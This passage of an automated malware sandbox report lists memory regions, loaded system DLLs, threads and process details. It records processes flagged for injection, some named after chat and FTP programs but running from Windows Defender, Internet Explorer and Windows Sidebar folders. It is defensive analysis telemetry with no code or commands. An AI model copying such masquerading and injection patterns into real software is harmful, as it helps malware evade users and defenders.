4610 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4611 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4612 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4613 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4614 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4615 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4616 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4617 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4618 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 211 os_tid = 0x12a0 Thread: id = 212 os_tid = 0x11b0 Process: id = "45" image_name = "trillian.exe" filename = "c:\\program files (x86)\\internet explorer\\trillian.exe" page_root = "0x748d6000" os_pid = "0x11bc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\trillian.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4715 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4716 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4717 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4718 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4719 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4720 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4721 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4722 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4723 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4724 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4725 start_va = 0x290000 end_va = 0x2a6fff monitored = 0 entry_point = 0x2914a1 region_type = mapped_file name = "trillian.exe" filename = "\\Program Files (x86)\\Internet Explorer\\trillian.exe" (normalized: "c:\\program files (x86)\\internet explorer\\trillian.exe") Region: id = 4726 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 4727 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4728 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 4729 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4730 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 4731 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 4732 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 4733 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4734 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4735 start_va = 0x1fc0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 4736 start_va = 0x1fd0000 end_va = 0x208bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fd0000" filename = "" Region: id = 4737 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4738 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4739 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4740 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4741 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4742 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4743 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4744 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4745 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4746 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4747 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4748 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4749 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4750 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4751 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4752 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4753 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4754 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4755 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4756 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4757 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4758 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4759 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4760 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4761 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4762 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 213 os_tid = 0x12a4 Thread: id = 214 os_tid = 0x11c0 Process: id = "46" image_name = "filezilla.exe" filename = "c:\\program files\\windows defender\\filezilla.exe" page_root = "0x20426000" os_pid = "0x113c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Defender\\filezilla.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2795 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2796 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2797 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2798 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2799 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2800 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2801 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2802 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2803 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2804 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2805 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2806 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2807 start_va = 0x210000 end_va = 0x2cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2808 start_va = 0x310000 end_va = 0x326fff monitored = 0 entry_point = 0x3114a1 region_type = mapped_file name = "filezilla.exe" filename = "\\Program Files\\Windows Defender\\filezilla.exe" (normalized: "c:\\program files\\windows defender\\filezilla.exe") Region: id = 2809 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2810 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2811 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2812 start_va = 0x860000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 2813 start_va = 0x9f0000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 2814 start_va = 0xb80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 2815 start_va = 0x1f80000 end_va = 0x203bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 2816 start_va = 0x2040000 end_va = 0x204ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2817 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2818 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2819 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2820 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2821 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2822 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2823 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2824 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2825 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2826 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2827 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2828 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2829 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2830 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2831 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2832 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2833 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2834 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2835 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2836 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2837 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2838 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2839 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2840 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2841 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2842 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 215 os_tid = 0x1268 Thread: id = 216 os_tid = 0x1140 Process: id = "47" image_name = "yahoomessenger.exe" filename = "c:\\program files (x86)\\windows sidebar\\yahoomessenger.exe" page_root = "0x433e8000" os_pid = "0x11d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\yahoomessenger.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3899 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3900 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3901 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3902 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3903 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3904 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3905 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3906 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3907 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3908 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3909 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3910 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3911 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3912 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3913 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3914 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3915 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3916 start_va = 0xb00000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 3917 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3918 start_va = 0xc00000 end_va = 0xc16fff monitored = 0 entry_point = 0xc014a1 region_type = mapped_file name = "yahoomessenger.exe" filename = "\\Program Files (x86)\\Windows Sidebar\\yahoomessenger.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\yahoomessenger.exe") Region: id = 3919 start_va = 0xc20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 3920 start_va = 0x2020000 end_va = 0x20dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 3921 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3922 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3923 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3924 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3925 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3926 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3927 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 